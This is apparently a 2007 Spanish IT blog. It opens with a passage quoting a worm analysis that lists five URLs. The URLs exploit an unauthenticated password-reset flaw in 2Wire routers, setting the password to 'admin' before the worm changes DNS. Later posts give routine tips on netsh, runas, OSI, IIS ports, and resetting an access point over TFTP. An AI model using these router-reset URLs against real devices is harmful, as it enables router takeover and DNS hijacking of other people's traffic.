http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

Aquí se pueden identificar los diversos intentos de llegar al ruteador para reestablecer la contraseña a “admin”. En el caso de nuestro equipo la URL que tuvo éxito fue la correspondiente a la IP 192.168.1.254.
Cabe señalar que el router contaba con una contraseña del sistema, establecida previamente, después de esta etapa del ataque la contraseña fue sobrescrita.

La página desde donde se sobrescribe la contraseña corresponde al wizard de configuración, por lo que al parecer el sistema no pide autenticación si se pasa como parámetro la nueva contraseña.

una vez dentro, modifica los parametros de dns y ejecuta una sustitucion de las paginas que desea redireccionar...

Fuente (con caché de google para que no haya errores por que quiten la pagina):
http://209.85.173.104/search?q=cache:BAaiyILcmygJ:www.seguridad.unam.mx/doc/%3Fap%3Darticulo%26id%3D196+xploit+gusanito+download&hl=es&ct=clnk&cd=17&gl=mx

Drivers de VAIO

2007-12-17T17:42:00.001-08:00

esta es una pagina para descargar software y drivers oficiales de sony vaio
http://esupport.sony.com/LA/perl/model-home.pl?mdl=VGNFS815F&LOC=3

NETSH

2007-12-17T14:28:00.000-08:00

NETSH
Netsh, también llamado NetShell o Network Shell, es una herramienta basada en línea de comando que configura el servicio DHCP, el servicio RAS y servicios de red de enrutamiento. Un contexto de Netsh es un estado en el cual Netsh acepta los comandos relacionados con un sistema específico de funciones. Cada contexto de Netsh contiene las características para manejar un sistema relacionado específico de funciones del establecimiento de una red. Usted puede cambiar a otros contextos escribiendo el nombre de un contexto. También se utiliza para agregar una dirección del Internet Protocol (IP), o para configurar el WINS y el Domain Name System (DNS) en la interfaz.(Traducción hecha por Google)
Como quien dice. Con el NETSH puedes :
Cambiar una dirección IP y Gateway.
Si tu dirección IP es 192.168.0.10, Netmask 255.255.255.0 y Gateway 192.168.0.1 y la quieres cambiar a IP: 192.168.0.69 NM: 255.255.254.0 GW: 192.168.0.2, primero escribe Netsh, luego interface y ahora ip, escribe set address “adaptador” static 192.168.0.69 255.255.254.0 192.168.0.2 1 el último 1 es la interfaz métrica, si no lo escribes, no va a funcionar
Ahora, aspi es como lo verías en tu pantalla. Para conocer tu dirección IP desde línea de comandos escribe IPCONFIG
C:\>ipconfig
Configuración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.10Máscara de subred . . . . . . . . . . : 255.255.255.0Puerta de enlace predeterminada . . . : 192.168.0.1
C:\>netshnetsh>interfaceinterface>ipinterface ip>set address "ethernet00" static 192.168.0.69 255.255.254.0 192.168.0.2 1
Al presionar “Enter” te va a salir un mensaje que dice “Command Succesfully” o “Aceptar”, y si quieres ver que se han realizado los cambios, escribe “quit” para que te regrese a C:\ y una vez ahí escribe de nuevo IPCONFIG para ver los resultados,
C:\>netshnetsh>interfaceinterface>ipinterface ip>set address "ethernet00" static 192.168.0.69 255.255.254.0 192.168.0.2 1Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Como puedes ver, hemos cambiado una dirección IP desde línea de comando.
Agregar una dirección IP
IP 192.168.0.10 NM 255.255.255.0 GW 192.168.0.1, y quieres agregar la dirección 192.168.10.10 NM 255.255.0.0 Add address “adaptador” 192.168.10.10 255.255.0.0
C:\>netshnetsh>interfaceinterface>ipinterface ip>Add address "ethernet00" 192.168.10.10 255.255.0.0Aceptar
interface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.10.10Máscara de subred . . . . . . . . . . : 255.255.0.0Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Si quieres agregar la misma dirección pero además quieres agregar otro gateway, digamos 192.168.10.1 Add address “adaptador” 192.168.10.10 255.255.0.0 192.168.10.1 1
C:\>netshnetsh>interface ipinterface ip>Add address "ethernet00" 192.168.10.10 255.255.0.0 192.168.10.1 1Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.10.10Máscara de subred . . . . . . . . . . : 255.255.0.0Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Borrar una dirección IP
Si nomás quieres borrar la dirección escribe: delete address “adaptador” 192.168.10.10
C:\>netshnetsh>interface ipinterface ip>delete address "ethernet00" 192.168.10.10Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.2
Si quieres borrar la dirección junto con el gateway, escribe: delete address “adaptador” 192.168.10.10 192.168.0.2
C:\>netshnetsh>interface ipinterface ip>delete address "ethernet00" 192.168.10.10 192.168.0.2Aceptarinterface ip>quitC:\>ipconfigConfiguración IP de Windows 2000
Ethernet adaptador Ethernet00:
Sufijo DNS específico de la conexión. :Dirección IP. . . . . . . . . . . . . : 192.168.0.69Máscara de subred . . . . . . . . . . : 255.255.254.0Puerta de enlace predeterminada . . . : 192.168.0.1
Como ya habíamos agregado otro gateway, y borramos el predeterminado, ahora vemos el que habíamos agregado.

fuente: http://raza-mexicana.org/textos/revista/html/15/ezine15-06.htm+netsh+interface+gateway&hl=es&ct=clnk&cd=2&gl=mx

Consola en modo administrador

2007-12-17T14:25:00.000-08:00

encontre por ahi un articulo de una pagina que traia estas lineas de comando muy buenas que pueden servirle a cualquiera en un momento dado:

Por seguridad es conveniente trabajar en una cuenta de usuario y no en la de administrador, sin embargo, si en un momento dado necesitamos cambiar permisos, instalar alguna utilidad o cambiar alguna configuración, tendríamos que cerrar todos los programas, cerrar la sesión, entrar como administrador y efectuar los cambios necesarios para luego volver a nuestra sesión de usuario. Windows XP aporta la novedad del cambio rápido de usuario, que permite iniciar otra sesión sin cerrar los programas de la que está activa, pero incluso esto puede ser muy engorroso si lo único que se se quiere es cambiar los permisos de un fichero.
Por ello, una solución, muy al estilo UNIX, es tener un acceso directo a una consola que se ejecute con permisos de administrador. Cualquier programa que se ejecute desde esa consola estará bajo su contexto de seguridad, así que podemos hacer cosas que no se pueden desde la cuenta de usuario. El comando a poner en el acceso directo sería:

%SystemRoot%\System32\runas.exe /noprofile /user:Administrador %SystemRoot%\system32\cmd.exe

Cuando lo ejecutemos nos pedirá la clave de Administrador y en la ventana de comandos que abre podremos ejecutar cualquier aplicación. El uso más común es hacer algún cambio en la configuración, así que los comandos más usados son:

lusrmgr.msc Administración de usuarios y grupos
ervices.msc Lista de servicios
evmgmt.msc Administrador de dispositivos
diskmgmt.msc Administrador de discos
eventvwr.msc Visor de sucesos
perfmon.msc Monitor del sistema
appwiz.cpl Agregar y quitar programas
hdwwiz.cpl Administrador de dispositivos
timedate.cpl Fecha y hora
powercfg.cpl Opciones de energía
sysdm.cpl Sistema (Mi PC → Propiedades)
cacls Cambiar permisos en archivos y carpetas

fuente: http://www.ayudawindows.com/2000/ConsolaAdmin.htm

Modelo OSI en resumen practico

2007-12-03T10:48:00.000-08:00

El modelo osi fue creado por la organizacion internacional de estadarizacion (ISO) y esta orientado a conectividad de sistemas abiertos, este es un modelo ampliamente utilizado en protocolos de comunicacion... Hoy me preguntaron como comprender la cantidad de capas en el modelo y el nombre de los encapsulados segun la capa en la que se encuentra... Como solucion para comprenderlo y aprenderselo pueden seguir los siguientes pasos...

1.- Entender y memorizar que el modelo osi tiene 7 [SIETE] capas.
2.-Comprender que el modelo se ve desde dos puntos de vista, el EMISOR y el RECEPTOR.
NOTA.- EMISOR es quien Transmite informacion. RECEPTOR es quien recibe la informacion.
3.- Entendidos los puntos de vista, el modelo osi visto desde el punto de vista del emisor, se tiene:

A
P
S
T
R
E
F

Es decir, siete iniciales bastante entendibles... La pregunta obligada, a que se refiere cada inicial?

Aplicacion
Presentacion
Sesion
Transporte
Red
Enlace de Datos
Fisica

Estas capas tienen una labor, eso lo detallare mas adelante, ahora bien, dentro de las capas los datos van cambiando a traves del tiempo, estos datos se encapsulan, lo importante es saber como se le llaman a los datos encapsulados...

A
P
S
T - S
R - P
E - T
F - B

Que rayos es esto?
En la capa de transporte se le llama SEGMENTO.
En la capa de Red se le llama PAQUETE.
En la capa de Enlace de Datos se le llama Trama.
En la capa Fisica se le llama BIT.

Para no confundirlos mas pues si lo vemos desde el punto de vista que en el abecedario antes de la T va la S, en la capa de Transporte se llama Segmento y de ahi sigue Paquete, Trama y Bit en las capas subsecuentes.

cambiar de puerto el IIS

2007-11-22T19:38:00.000-08:00

En la eterna busqueda por la verdad en windows, encontre con un cliente la necesidad para cambiar el puerto del IIS, el cual es el sistema de servicios para internet o el servidor de paginas web para quien lo entienda mejor asi... los pasos varian segun la version, versiones mas recientes son mas faciles, pero dejo aqui mas que nada esto por las versiones mas antiguas donde se tiene uno que meter a los registros:

Versiones 1,0 a 2,0 de Microsoft Internet Information Server1. Inicie Regedt32.exe y busque la subclave siguiente de

Registro:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceProvider\ServiceType\W3SVC
2. Busque el valor Puerto TCP y haga doble clic en ello.
3. El cuadro de diálogo Editor de DWORD debería aparecer con el valor predeterminado enumerado (Hexadecimal 0x50; 80

Decimal). Cambie el valor de decimal al número del puerto en el que desea que el servicio de publicación World Wide Web

escuche.

NOTA: También puede seguir servicios de pasos 2 y 3 para cambiar lo siguiente: • MSFTPSVC: Servicio de publicación FTP
• GOPHERSVC: Servicio de publicación gopher

4. Salga de Regedt32.exe.
5. Detenga y reinicie los servicios IIS usando el Administrador de servicios Internet.

Microsoft Internet Information Server versión 3.01. Abra Administrador de servicios Internet.
2. Haga doble clic en el equipo correspondiente al servicio WWW.
3. En la ficha Servicio, cambie el campo Puerto TCP al número de puerto deseado.
4. Haga clic en Aceptar.
5. Usando el Administrador de servicios Internet, detenga y reinicie los servicios de IIS.

Versiones 4,0 a 6,0 Servicios de Microsoft Internet Information Server1. Abra Administrador de servicios Internet o

administrador de Servicios de Internet Information Server (IIS).
2. Necesario, expanda el servidor Web que se desea y a continuación, expanda Sitios Web.
3. Haga clic con el botón secundario en el sitio Web que desea cambiar.
4. Haga clic en Propiedades.
5. Haga clic en la ficha Sitio Web.
6. Cambie el Número de Puerto TCP en el cuadro de edición Puerto TCP (o haga clic en Avanzadas para varias

configuraciones de Puerto).
7. Haga clic en Aceptar para guardar los cambios.

fuente:
http://support.microsoft.com/kb/149605/es

el maldito MSN Content Plus... Como desinstalarlo... Solucion definitiva

2007-11-22T19:26:00.000-08:00

El eterno problema (el de la ventana que sigue saliendo con el nombre msn content plus), se le ha presentado a uno de mis clientes... me meti en miles de foros y segui todos los pasos, borre todo lo relacionadocon MSN content plus y seguia saliendo el mensajito del trial y si aceptaba se desconectaba el messenger, sin embargo, solo deben teclear lo siguiente para solucionar el problemita...

Suponiendo que ya intentaste desinstalar desde agregar quitar programas o desde el menu haz lo siguiente:

1º: reiniciar el sistema, cuando este iniciando presionar consecutivamente F8 hasta que aparezca un menu, en ese menu seleccionar MODO SEGURO y dar enter. Esperar que se cargue el windows a prueba de fallos.
2º: una vez iniciado el sistema a prueba de fallos, ir a la ventana de busqueda (si, la del perrito ogt ese) y buscar los siguientes archivos: primero "msnlogs.exe" y borrarlo, luego msnlogm.exe" e igualmente borrarlo.
3·º Reiniciar el equipo y listo, todo limpio...

saludos!

Como dar RESET a un EnGenius (SENAO) NOC-8610 EXT

2007-11-06T10:39:00.000-08:00

Bien, este post lo hice hace tiempo en otro blog (como ya comenté, ahora me paso a este dado que muchos post de blog se me han perdido debido a que los servidores desaparecen).

Resulta ser que mientras trabajaba en un proyecto de instalacion de una red inalambrica de potencia para exteriores e interiores, me sucedio un caso extraño que a continuacion describire, pero que aparentemente recurrente dada mi investigacion posterior en internet.

Compramos un Access Point / Bridge marca Engenius (Senao) NOC-8610 EXT, el cual es un aparato de transmision WiFi de potencia para exteriores.

Al instalrlo se realizo lo necesario para que quedara perfectamente configurado y transmitiendo, sin embargo justo al final cuando todo estaba configurado decidi realizar el paso de seguridad obligado... Ponerle contraseña de acceso a la pagina de configuracion...

Este paso es obligatorio en toda instalacion de red inalambrica con miras a que nadie pueda acceder de manera no autorizada a modificar los parametros del aparato... Sin embargo, surgio un detalle bastante interesante; justo despues de colocar la contraseña el dispositivo no permitio el acceso, es decir, repetidamente coloque la contraseña y no me permitio acceder de nuevo a la interfaz de configuracion.

Al investigar en internet, analizar varios casos y buscar soluciones diversas al problema, descubri que el software tenia bugs (errores de programacion) los cuales ocasionaban muchos problemas al rededor del mundo con estos aparatos. La solucion mas factibe era reiniciar el equipo, pero no de apagarlo y ecenderlo, si no reiniciar los parametros por defecto que trae de fabrica el aparato, de manera tal que quedara tal como se compro... Pero... existia un detalle, y ese era que no trae Boton de Reset... La mayoria de los aparatos de este tipo tienen un pequeño boton que reinicia el sistema, sin embargo este modelo no traia. Investigando por internet encontre que la "unica" forma de reiniciar el aparato es por medio de la interfaz serial que trae el mismo, es decir, conectar un cable tipo NULL MODEM en una punta al puerto serial de una pc y la otra punta a la interfaz serial del aparato, sin embargo no tenia disponible ni 1 cable null modem ni una pc con puerto serial (tengo una laptop que no lo trae).

Pase cerca de 24 horas buscando una solucion factible, traumatizado por que todo el proyecto se habia detenido por culpa mia, sin embargo de tanto investigar y leer encontre que estos dispositivos tienen (ademas del puerto 80 para comunicacion) un puerto para transferencia trivial del archivos sin contraseña (TFTP). A lo cual se me ocurrio lo siguiente:

¿Es posible que mediante la interfaz de red RJ45 y cargando por TFTP la version del firmware usado en el dispositivo se pudiera borrar el anterior y establecer el "nuevo" como por defecto?

Para responder esa pregunta tuve que buscar primeramente la version del firmware correcta.

No encontre el firmware especifico pero encontre una actualizacion por lo cual supuse que funcionaria y en efecto asi fue... los pasos para retornar por defecto al sistema son los siguientes:

1.- Primeramente descargar si es posible este archivo que ya tiene todo lo que se necesita:

http://rapidshare.com/files/38449314/pass_solution.zip<>

2.- Extraer todo el contenido y copiar los archivos tftp.exe y update.bin a la ruta:

C:\Documents and Settings\"usuario de windows"\

NOTA: donde usuario de windows es el nombre de la sesion de usuario que esta abierta en la maquina que utilizaras para conectarte al aparato por red.

3.- Conectar punto a punto tu maquina con el aparato mediante cable de red .

3.- Dar click en INICIO luego en EJECUTAR, en la caja de texto colocar CMD y dar enter.

4.- se abra una linea de comandos, colocar el siguiente comando:

tftp -i ip PUT upgrade.bin <-(y dar enter al final)

NOTA.- Donde ip, es la direccion del access point /bridge, normalmente es 192.168.1.1 para el modo de bridge y 192.168.1.2 para modo access point...

5.- despues de que se haya cargado el archivo solo basta iniciar la sesion http con el aparato mediante el navegador colocando la direccion http://192.168.1.1 (o bien http://192.168.1.2 si es modo ap), al ingresar deja en blanco el usuario y el password, da click en el boton de ingreso y listo, el aparato te dejara entrar a la interfaz de configuracion teniendo todo por defecto.

NOTA.- En caso de que no puedas haber descargado de rapid share el zip tendras que descargar directamente de las paginas de referencia que a continuacion describo:

update.bin:

http://www.engeniustech.com/datacom/support/firmware.aspx

tftp.exe:

http://www.winagents.com/downloads/tftp.exe

Copias ambos como en el paso 2 y listo.

Saludos y espero esto sirva...

El Inicio del blog...

2007-11-02T03:39:00.000-07:00

Hace algun tiempo estuve publicando paginas de informacion sobre mantenimiento de equipos y experiencias profesionales en blogs de otros sitios, sin embargo al ser sitios no oficiales quedaron fuera de servicio pronto y toda la informacion generada se perdio, llegue a publicar muchos procedimientos para mantenimientos de computo segun me iban surgiendo...

Mi intencion con este blog es volver a intentarlo en algo que aparentemente es mas estable, esperemos que este si dure...

El inicio de este blog acontece a una experiencia profesional que me ha sacado de quizio las ultimas 7 horas...

El dia de hoy (o deberia decir ayer ya que soy las 4:40am del viernes 2 de Noviembre de 2007) se nos ha dado el dia libre en mi trabajo (un servidor es catedratico de un instituto educativo en la carrera de ingenieria en sistemas computacionales) por cuestiones de las celebraciones actuales (dia de muertos), asi como los dias subsecuentes hasta el proximo domingo... Sin embargo, uno de mis tantos trabajos alternativos (los cuales seguramente iran conociendo segun pase el tiempo y sigan leyendo mi blog) es atender reparaciones de equipo de computo para poder mantenerme actualizado en problemas de equipos de computo y sus respectivas soluciones (ademas de ganarme un dinero extra que buena falta hace a cualquiera).

Como comentaba, al tener el dia libre, acepte reparar una computadora Dell optiplex gx620 (lindo diseño dicho sea de paso), la cual segun mi cliente "solo" requeria unos detallitos por hacer: instalar un nuevo antivirus y desinstalar la aplicacion que se habia vencido por ser Trial (demo, version prueba o como le quiera llamar)... es decir, el ***** panda antivirus + firewall 2008 [NOTA.- donde ***** son Maldiciones Iterativas en ciclo for (int i=1;i>0;i++) ]...

Resulta ser que se me ocurrio la brillante idea de instalar el AVG Antivirus e incluso pense en el Nod32 con medicina... Asi pues tome la decision (que no le recomiendo a nadie) de ir al panel de control, dar click en agregar o quitar programas, seleccionar el ****** Panda antivirus + firewall 2008 y darle quitar... Justo aqui comienza una pesadilla de 7 horas que quizas a alguien le pueda pasar, asi que por favor... no hagan lo que he escrito... si quieren saber el ¿por qué? solo sigan leyendo...

Resulta ser que el pandita me pide reiniciar el sistema para "completar la instalacion", algo natural en el ***** windows (jejejej, si, tambien maldiciones iterativas, yo uso ubuntu)... Al reiniciar, note que la maquina se torno verdaderamente LENTA!, es decir no lenta con minusculas, si no LENTA! con mayusculas y signo de admiracion... tardaba 5 minutos cronometrados en iniciar la sesion, otros 3 en cargar los iconos del escritorio y apenas respondia el puntero... De inmediato me di cuenta que algo andaba muy mal... le di su tiempo, le tuve paciencia por algunas horas para que terminara de arrancar, reinicie varias veces para verificar si no era un cuelgue tan acostumbrado ya en windows... Sin embargo, no lo era, esto iba mas alla de los errores convencionales del Winbugs...

Al no tener mas que la referencia de la desinstalacion del panda, intente cargar el salvador RESTAURAR SISTEMA... pero "surprise!", no cargo :S por un segundo pense que habia un error, asi que al mas puro estilo de usuario inpaciente di de nuevo doble click sobre el icono de restaurar sistema con los mismos resultados... Algo andaba muy mal, tardado para iniciar, tardado para acceder y todavia sin respuesta de programas... crei entonces que algun mal karma se habia apoderado de la PC o peor :S de mi... intente acceder a internet explorer sin resultados, y al intentar verificar la tarjeta de red para analizar las direcciones IP "surprise 2!", no habia tal :S en efecto, no habia tarjeta de red... aparentemente el servicio no habia cargado aun (para variar) y no existia la tarjeta de red... por ende no habia conexion ni forma de acceder a la red.

Al tener mi lap top (de la cual redacto esto) cerca y gracias a la conexion de Infiernitum Wi Fi tuve acceso rapido a internet para realizar una busqueda rapida sobre como rayos desinstalar el ***** Panda antivirus + firewall 2008... en mi busqueda encontre el siguiente enlace:

http://www.pandaantivirus.com.ar/descargasantivirus/index.php

que en realidad salvo el dia (o la noche y madrugada)... En la parte de abajo ofrece un desinstalador generico del panda antivirus, asi pues entre ideas y mas ideas lo que me resulto efectivo ya con el desinstalador generico en mano fue lo siguiente:

1.- Reinicie la computadora e incie sesion (15 minutos).
2.- Espere a que los sistemas y servicios cargaran lo suficiente como para que ya me permitiera acceder al programa restaurar sistema (48 minutos)
3.- Ejecute la restauracion del sistema hasta ANTES de desinstalar el panda que seria un punto de control del sistema anterior al dia en que desinstalaron el panda (mucho ojo en este paso por que hay un punto de restauracion que se genera cuando ya se ha desinstalado el panda, regresar ahi seria volver a empezar con los mismos problemas, y lo digo por que me paso jajajajaja). (13 minutos).
4.- Esperar a que inicie el sistema restaurado (8 minutos).
5.- Ejecutar el archivo UNINST_v1011.exe descargado del sitio que proporcione (5 minutos).
6.- Reiniciar el sistema (curiosamente mucho menos tiempo, 3 minutos).
7.- Ver al sistema trabajando normal y sin el ***** panda antivirus + firewall 2008 para al fin poder dormir (no tiene precio)...

ya lo ultimo que hice fue instalar el Nod32 con medicina y actualizarlo, con eso el sistema quedo al 100%...

Ojala esto le sirva a alguien para que no le pase lo que a mi, creanme llevaba 7 horas ya en esto por que estuve esperando a que arrancara bien la computadora y eso tomo demasiado tiempo, obviamente me fui a cenar, vi television y regresaba a echarle el ojo a la PC, pero en verdad fue desesperante la forma en como demoraba tan solo para encender... Suerte en todo y no se pierdan el proximo capitulo de esta bitacora de experiencias profesionales... Un saludo a todos los que llegaron a leer hasta aqui sin aburrirse, les agradezco... Hasta la proxima.